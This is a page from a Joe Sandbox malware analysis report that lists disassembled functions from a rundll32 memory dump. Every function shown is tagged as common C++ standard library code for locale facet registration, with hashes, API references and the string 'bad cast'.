Opcode ID: e92ebb4505384e37149a9af64b0ed7b997fd3b62a18224f75f4565cc40b02c60
Instruction ID: f90d0cbeb8849b8ddfe9301e58c6abb60f629ccff1643932871510168bf1b9cc
Opcode Fuzzy Hash: e92ebb4505384e37149a9af64b0ed7b997fd3b62a18224f75f4565cc40b02c60
Instruction Fuzzy Hash: BF315E32208FC081EB169B25E4443DE67E2E794BA8F550322DE6E477EBDE38C4868700

Function 000001E51AE08498 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE084B9

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE084DE
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08508
messages.LIBCPMT ref: 000001E51AE08561
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE08578
_CxxThrowException.LIBCMT ref: 000001E51AE08589
std::_Facet_Register.LIBCPMT ref: 000001E51AE085A7
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE085B2

Strings

bad cast, xrefs: 000001E51AE0856C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: bb88f8af8f6ad0f94797e91181e4a5fede4ca1b0857083484043c23cb2229bcb
Instruction ID: 3808d9866e7b7f3d6a966728e857d5a247eeb35cfa00ec76f8d8aa8290c398c9
Opcode Fuzzy Hash: bb88f8af8f6ad0f94797e91181e4a5fede4ca1b0857083484043c23cb2229bcb
Instruction Fuzzy Hash: DE310E71208F8092EB17AB65E9403DD77E2F794BA8F945322DE59876EBDE34C4458700

Function 000001E51AE08238 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08259

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0827E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE082A8
messages.LIBCPMT ref: 000001E51AE08301
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE08318
_CxxThrowException.LIBCMT ref: 000001E51AE08329
std::_Facet_Register.LIBCPMT ref: 000001E51AE08347
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08352

Strings

bad cast, xrefs: 000001E51AE0830C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: f6e975c9ed1fc811ddeed3bf09c1872f6a5632ab065b9bea6ee0b1db81a6e053
Instruction ID: 2bb5866b6440bdf70ab0a9b501e321d58f8fdf78b88863b041d2a7bf6f44a858
Opcode Fuzzy Hash: f6e975c9ed1fc811ddeed3bf09c1872f6a5632ab065b9bea6ee0b1db81a6e053
Instruction Fuzzy Hash: 95312C32308F8082EB179B69E5403DD77E2F794BA8F545322DE6A476ABDE38C4458700

Function 000001E51ADF3244 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3265

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF328A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF32B4
messages.LIBCPMT ref: 000001E51ADF330D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3324
_CxxThrowException.LIBCMT ref: 000001E51ADF3335
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3353
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF335E

Strings

bad cast, xrefs: 000001E51ADF3318

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: d82304bf4a96c8aa3365fbec0ce9b6afb946fba8665589bd6e4ea4bbafcdc822
Instruction ID: c37f88510a55e7f83613cc773ea4baf1145b8c671dba1654328d6e24f94d379a
Opcode Fuzzy Hash: d82304bf4a96c8aa3365fbec0ce9b6afb946fba8665589bd6e4ea4bbafcdc822
Instruction Fuzzy Hash: 65311231208FC191EB16DB65E4403DE67E2F794BA8F595321DE69476EBDF38C4468700

Function 000001E51ADF41B4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF41D5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF41FA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF4224
numpunct.LIBCPMT ref: 000001E51ADF427D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF4294
_CxxThrowException.LIBCMT ref: 000001E51ADF42A5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF42C3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF42CE

Strings

bad cast, xrefs: 000001E51ADF4288

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4059195664-3145022300
Opcode ID: 1fe0c26a9036abef5ee95c4ac4b3fdedf737f9338d7163a728943c57dc64d707
Instruction ID: 96a7cdac7a6f02ceae9284f1fef285b9d3f49cea0d7ffb71a79930049ef5e034
Opcode Fuzzy Hash: 1fe0c26a9036abef5ee95c4ac4b3fdedf737f9338d7163a728943c57dc64d707
Instruction Fuzzy Hash: 50315E76209F8091EB12DB65E4403DE67E2F794BA8F544322DE59476EBDE38C486C700

Function 000001E51ADF3834 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3855

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF387A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF38A4
moneypunct.LIBCPMT ref: 000001E51ADF38FD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3914
_CxxThrowException.LIBCMT ref: 000001E51ADF3925
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3943
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF394E

Strings

bad cast, xrefs: 000001E51ADF3908

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: 27282701b454dac3068bf00fab1c7e364559ed58de656c77c796e4e0c147b80e
Instruction ID: dbabbc02a373c794c339cca9c47852f090b37529b7ee0d16ef0cd5eb3dbe4b94
Opcode Fuzzy Hash: 27282701b454dac3068bf00fab1c7e364559ed58de656c77c796e4e0c147b80e
Instruction Fuzzy Hash: B4312335608F8091EB169B65E4403DE67E2F794BA8F554322DE6E476EBDE3CC886C700

Function 000001E51ADEC7A4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC7C5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC7EA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC814
messages.LIBCPMT ref: 000001E51ADEC86D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADEC884
_CxxThrowException.LIBCMT ref: 000001E51ADEC895
std::_Facet_Register.LIBCPMT ref: 000001E51ADEC8B3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC8BE

Strings

bad cast, xrefs: 000001E51ADEC878

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: cb7218c9b988feff46bbc91aa592dedbc53cea0b91ed73328e4fffe9f7b77c5a
Instruction ID: 384a23b054da03d4bdea73de445a816cd55d83fc79a66dc688f62e21840672b8
Opcode Fuzzy Hash: cb7218c9b988feff46bbc91aa592dedbc53cea0b91ed73328e4fffe9f7b77c5a
Instruction Fuzzy Hash: 69313032608FC081EB529B29E5803ED67E2E794BA8F584322DE5D477EBDE34C885C740

Function 000001E51ADEC8D4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC8F5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC91A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC944
messages.LIBCPMT ref: 000001E51ADEC99D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADEC9B4
_CxxThrowException.LIBCMT ref: 000001E51ADEC9C5
std::_Facet_Register.LIBCPMT ref: 000001E51ADEC9E3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC9EE

Strings

bad cast, xrefs: 000001E51ADEC9A8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: a319b8759b665be4c8045255bfd444d3c342c13c887630317bc6ad245192e08a
Instruction ID: 1a7a88b02d801af55b6658bbf7a5cba8262ae115bdd3cdcffcd2c77184196bf1
Opcode Fuzzy Hash: a319b8759b665be4c8045255bfd444d3c342c13c887630317bc6ad245192e08a
Instruction Fuzzy Hash: EB31FE32208F8091EB169B29E8503ED67F2F794BA8F544322DE59476EBDE34C885C740

Function 000001E51ADF35D4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF35F5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF361A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3644
messages.LIBCPMT ref: 000001E51ADF369D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF36B4
_CxxThrowException.LIBCMT ref: 000001E51ADF36C5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF36E3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF36EE

Strings

bad cast, xrefs: 000001E51ADF36A8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: 536d951579794d9ac5848435dcda0d8056ecb28f286086e041b4dee6b5989298
Instruction ID: 6c708a7a23ab49fa9ab953205e29774acd910740a333576d65895888f78e9102
Opcode Fuzzy Hash: 536d951579794d9ac5848435dcda0d8056ecb28f286086e041b4dee6b5989298
Instruction Fuzzy Hash: 45311E32208F8091EB179B65E8403DE67E2E794BA8F554322DE79477EBDE78C486C700

Function 000001E51AE085C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE085E9

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0860E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08638
moneypunct.LIBCPMT ref: 000001E51AE08691
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE086A8
_CxxThrowException.LIBCMT ref: 000001E51AE086B9
std::_Facet_Register.LIBCPMT ref: 000001E51AE086D7
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE086E2

Strings

bad cast, xrefs: 000001E51AE0869C

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: 29cb517ef353edaf7fe96a55ad9e16f417422b8bc592340c9ae3e73a311cc7df
Instruction ID: 4497246a60ab34339eea7d15d8496df929c8ac60771bca08df8bcc82116ee3e7
Opcode Fuzzy Hash: 29cb517ef353edaf7fe96a55ad9e16f417422b8bc592340c9ae3e73a311cc7df
Instruction Fuzzy Hash: 85312A32608F8082EB13AB65E5503DD77E3F794BA8F554322DE69476EBDE34C8468740

Function 000001E51AE086F8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE08719

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51AE0873E
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08768
moneypunct.LIBCPMT ref: 000001E51AE087C1
std::bad_exception::bad_exception.LIBCMT ref: 000001E51AE087D8
_CxxThrowException.LIBCMT ref: 000001E51AE087E9
std::_Facet_Register.LIBCPMT ref: 000001E51AE08807
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51AE08812

Strings

bad cast, xrefs: 000001E51AE087CC

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: 7e8749b240ba5670e75988a1d08956d1c9e00ca2f6b9f8a9a670e6f4b17f3c11
Instruction ID: 98ba51b4317d49b9add98fe7917f99efa0d52a0031ae6552ad0f26ea79af1e3a
Opcode Fuzzy Hash: 7e8749b240ba5670e75988a1d08956d1c9e00ca2f6b9f8a9a670e6f4b17f3c11
Instruction Fuzzy Hash: A5311B32708F8092EB179B65E9407ED77E2E794BA8F584322DE59476EBDE34C485C700

Function 000001E51ADF3704 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3725

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF374A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3774
moneypunct.LIBCPMT ref: 000001E51ADF37CD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF37E4
_CxxThrowException.LIBCMT ref: 000001E51ADF37F5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3813
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF381E

Strings

bad cast, xrefs: 000001E51ADF37D8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmoneypunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 560648410-3145022300
Opcode ID: ae2b33eba0b5e10c670be5b46dedf71b670be409d592ec7623dc0068669dc4ac
Instruction ID: d425447ffe6272df24a0c702aca624cd5964cfa8d849b482af1784341dcf99e3
Opcode Fuzzy Hash: ae2b33eba0b5e10c670be5b46dedf71b670be409d592ec7623dc0068669dc4ac
Instruction Fuzzy Hash: A1313271208FC091EB12DB25E5403DE67E2F794BA8F554321DE6D476EBDE38C8468700

Function 000001E51ADEC674 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC695

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADEC6BA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC6E4
ctype.LIBCPMT ref: 000001E51ADEC73D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADEC754
_CxxThrowException.LIBCMT ref: 000001E51ADEC765
std::_Facet_Register.LIBCPMT ref: 000001E51ADEC783
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADEC78E

Strings

bad cast, xrefs: 000001E51ADEC748

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockctypestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 757613215-3145022300
Opcode ID: df4a671e88b4901a954107639c9d9fabf74deb048c105a0cb1eb7e8a5d1e765f
Instruction ID: 6d79ff7e33b039aa051bc246b972177f4a00ef838a5b817e976541debf2b2fb2
Opcode Fuzzy Hash: df4a671e88b4901a954107639c9d9fabf74deb048c105a0cb1eb7e8a5d1e765f
Instruction Fuzzy Hash: F3313E32208F8081EB16AB65E4503ED67F2F794BA8F544322DE59476EBDF38C8858740

Function 000001E51ADF3BC4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3BE5

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3C0A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3C34
messages.LIBCPMT ref: 000001E51ADF3C8D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3CA4
_CxxThrowException.LIBCMT ref: 000001E51ADF3CB5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3CD3
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3CDE

Strings

bad cast, xrefs: 000001E51ADF3C98

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: 2127f81a5437bb88b075241f3d29aaf0cf321937bbea42743d9c4b13c04cc0b3
Instruction ID: db808eca60465a731d9448cb3ef7a2ddeb2de1b25376732aa00c8fb22b45502e
Opcode Fuzzy Hash: 2127f81a5437bb88b075241f3d29aaf0cf321937bbea42743d9c4b13c04cc0b3
Instruction Fuzzy Hash: A1315531208F8091EB12DB65E4403DE67E2F794BA8F555321DE6E476EBDE38C846D700

Function 000001E51ADF3CF4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3D15

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3D3A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3D64
messages.LIBCPMT ref: 000001E51ADF3DBD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3DD4
_CxxThrowException.LIBCMT ref: 000001E51ADF3DE5
std::_Facet_Register.LIBCPMT ref: 000001E51ADF3E03
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF3E0E

Strings

bad cast, xrefs: 000001E51ADF3DC8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 662288457-3145022300
Opcode ID: 783429eb793c2f2f50d0740cc6b0d3dbcf1faffe9df41ccb9df6b9a803999d4c
Instruction ID: 75df07cdbb654ab571910a9cc54b5c82fa9bf397b68abfb1c1d7903c85efaa28
Opcode Fuzzy Hash: 783429eb793c2f2f50d0740cc6b0d3dbcf1faffe9df41ccb9df6b9a803999d4c
Instruction Fuzzy Hash: 18312172209F8091EB16DB25E9403DE67E2F794BA8F594322DE69476EBDE38C446C700

Function 000001E51ADF2C54 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2C75

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF2C9A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2CC4
collate.LIBCPMT ref: 000001E51ADF2D1D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF2D34
_CxxThrowException.LIBCMT ref: 000001E51ADF2D45
std::_Facet_Register.LIBCPMT ref: 000001E51ADF2D63
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF2D6E

Strings

bad cast, xrefs: 000001E51ADF2D28

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_lockcollatestd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4217240666-3145022300
Opcode ID: 0aac932d3e7c268931cf707a4d93752f56fee1ca9c031bf76c3d673b10170def
Instruction ID: 3bc83d4167a27091065f254eb766c8b5264fc50d248d327eced56547e3d96f70
Opcode Fuzzy Hash: 0aac932d3e7c268931cf707a4d93752f56fee1ca9c031bf76c3d673b10170def
Instruction Fuzzy Hash: FA311032609F8091EB16DB25E8503DE67E2F794BA8F584322DE59476EBDE38C486C740

Function 000001E51ADECA04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADECA25

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADECA4A
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADECA74
numpunct.LIBCPMT ref: 000001E51ADECACD
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADECAE4
_CxxThrowException.LIBCMT ref: 000001E51ADECAF5
std::_Facet_Register.LIBCPMT ref: 000001E51ADECB13
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADECB1E

Strings

bad cast, xrefs: 000001E51ADECAD8

Memory Dump Source

Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true

Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrow_locknumpunctstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 4059195664-3145022300
Opcode ID: 2041dd7da891098dc9ea848057da1134df316c48a7d12d52e319c026ea6f695a
Instruction ID: f0dc209602f23afc69fe86582c1ed599d02d01ccaee988f793cf263448bebaa4
Opcode Fuzzy Hash: 2041dd7da891098dc9ea848057da1134df316c48a7d12d52e319c026ea6f695a
Instruction Fuzzy Hash: 8A313C32608FC091EB16DB25E8403ED67E2F794BA8F544322DE59476EBDE38C9968740

Function 000001E51ADF3964 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF3985

Part of subcall function 000001E51ADEC2AC: _lock.LIBCMT ref: 000001E51ADEC2BE

std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADF39AA
std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADF39D4
moneypunct.LIBCPMT ref: 000001E51ADF3A2D
std::bad_exception::bad_exception.LIBCMT ref: 000001E51ADF3A44
